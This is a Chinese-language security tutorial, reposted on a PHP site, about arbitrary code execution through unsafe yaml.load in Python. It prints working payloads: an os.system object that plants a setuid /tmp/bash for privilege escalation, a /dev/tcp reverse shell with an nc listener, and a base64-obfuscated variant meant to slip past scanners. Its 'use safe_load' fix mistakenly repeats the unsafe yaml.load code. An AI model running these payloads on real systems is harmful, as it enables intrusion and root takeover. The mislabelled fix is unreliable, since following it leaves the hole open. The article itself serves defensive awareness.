在 Python 中使用 YAML 时要小心！可能存在安全漏洞-Python教程-PHP中文网

首页

后端开发

Python教程

在 Python 中使用 YAML 时要小心！可能存在安全漏洞

Patricia Arquette

Jan 03, 2025 pm 10:15 PM

Be Careful When Using YAML in Python! There May Be Security Vulnerabilities

Python 中的 YAML（YAML 不是标记语言）库已被确定存在允许在特定条件下执行任意命令的漏洞。该漏洞是由于使用 yaml.load 函数而未指定安全加载程序而引起的。默认情况下，yaml.load 可以执行任意 Python 对象，这为恶意负载创建了攻击面。

通过任意命令执行进行利用

根本风险在于反序列化过程。当 YAML 文档包含恶意负载时，yaml.load 会处理嵌入的指令，可能导致代码执行。例如，考虑以下代码片段：

import yaml

filename = "example.yml"
data = open(filename, 'r').read()
yaml.load(data)  # Unsafe usage

登录后复制

这里，yaml.load 函数不受限制地解析 example.yml，如果 YAML 内容包含不安全指令，则该函数很容易受到攻击。典型的漏洞利用负载可以被设计来执行任意系统命令。

有效负载示例

import yaml
from yaml import Loader, UnsafeLoader

# Malicious payload
payload = b'!!python/object/new:os.system ["cp `which bash` /tmp/bash;chown root /tmp/bash;chmod u+sx /tmp/bash"]'

# Exploitation
yaml.load(payload)
yaml.load(payload, Loader=Loader)
yaml.load(payload, Loader=UnsafeLoader)

登录后复制

每个调用都会处理有效负载，从而在 /tmp/bash 中创建特权可执行文件。然后可以使用提升的权限执行该二进制文件：

/tmp/bash -p

登录后复制

这表明，如果在权限配置错误或存在其他弱点的系统上利用该漏洞，则可能会出现权限提升的可能性。

反向 Shell 攻击

一个特别阴险的用例是利用该漏洞进行反向 shell。这使得攻击者能够远程访问目标计算机。该过程涉及在攻击者的计算机上启动侦听器并制作旨在建立反向连接的 YAML 文档。

在攻击者的机器上，启动 Netcat 监听器：

nc -lvnp 1234

登录后复制

在目标系统上，以 root 身份执行以下 Python 脚本：

import yaml

# Reverse shell payload
data = '!!python/object/new:os.system ["bash -c \"bash -i >& /dev/tcp/10.0.0.1/1234 0>&1\""]'
yaml.load(data)  # Executes the reverse shell

登录后复制

此有效负载指示目标计算机连接回攻击者的侦听器，提供具有执行进程权限的完全交互式 shell。

用于混淆的 Base64 编码

要绕过基本的安全控制或过滤器，有效负载可以进行 Base64 编码。此方法添加了一层混淆，可能会逃避静态分析工具的检测。

例子

from base64 import b64decode
import yaml

# Base64-encoded payload
encoded_payload = b"ISFweXRa...YXNoIl0="  # Truncated for brevity
payload = b64decode(encoded_payload)

# Execute the payload
yaml.load(payload)

登录后复制

缓解技术

专业人员必须采用严格的编码实践来消除此类漏洞。建议的缓解措施包括：

使用安全加载器：将 yaml.load 替换为 yaml.safe_load，这样可以防止执行任意对象。
```
import yaml

filename = "example.yml"
data = open(filename, 'r').read()
yaml.load(data)  # Unsafe usage
```
登录后复制
登录后复制
限制输入源：确保 YAML 输入经过净化并且仅来自可信来源。
应用静态分析：使用工具扫描代码库是否存在不安全的 yaml.load 调用。
环境强化：限制系统权限以最大程度地减少利用的影响。例如，使用容器化环境限制了攻击者提升权限的能力。

YAML 库的默认行为体现了与 Python 等动态类型语言中的反序列化相关的风险。利用此漏洞所需的复杂程度极低，因此它成为安全应用程序开发的高优先级问题。采用安全的编码实践以及强大的输入验证和运行时保护措施对于有效减轻这些风险至关重要。

以上是在 Python 中使用 YAML 时要小心！可能存在安全漏洞的详细内容。更多信息请关注PHP中文网其他相关文章！

本站声明

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系admin@php.cn

热AI工具

热工具

热门话题

Java教程

1666

CakePHP 教程

1426

Laravel 教程

1328

PHP教程

1273

C# 教程

1254

显示更多

Related knowledge

Python：游戏，Guis等 Apr 13, 2025 am 12:14 AM

Python在游戏和GUI开发中表现出色。1)游戏开发使用Pygame，提供绘图、音频等功能，适合创建2D游戏。2)GUI开发可选择Tkinter或PyQt，Tkinter简单易用，PyQt功能丰富，适合专业开发。

Python与C：学习曲线和易用性 Apr 19, 2025 am 12:20 AM

Python更易学且易用，C 则更强大但复杂。1.Python语法简洁，适合初学者，动态类型和自动内存管理使其易用，但可能导致运行时错误。2.C 提供低级控制和高级特性，适合高性能应用，但学习门槛高，需手动管理内存和类型安全。

Python和时间：充分利用您的学习时间 Apr 14, 2025 am 12:02 AM

要在有限的时间内最大化学习Python的效率，可以使用Python的datetime、time和schedule模块。1.datetime模块用于记录和规划学习时间。2.time模块帮助设置学习和休息时间。3.schedule模块自动化安排每周学习任务。

Python vs.C：探索性能和效率 Apr 18, 2025 am 12:20 AM

Python在开发效率上优于C ，但C 在执行性能上更高。1.Python的简洁语法和丰富库提高开发效率。2.C 的编译型特性和硬件控制提升执行性能。选择时需根据项目需求权衡开发速度与执行效率。

Python标准库的哪一部分是：列表或数组？ Apr 27, 2025 am 12:03 AM

pythonlistsarepartofthestAndArdLibrary，herilearRaysarenot.listsarebuilt-In，多功能，和Rused ForStoringCollections，而EasaraySaraySaraySaraysaraySaraySaraysaraySaraysarrayModuleandleandleandlesscommonlyusedDduetolimitedFunctionalityFunctionalityFunctionality。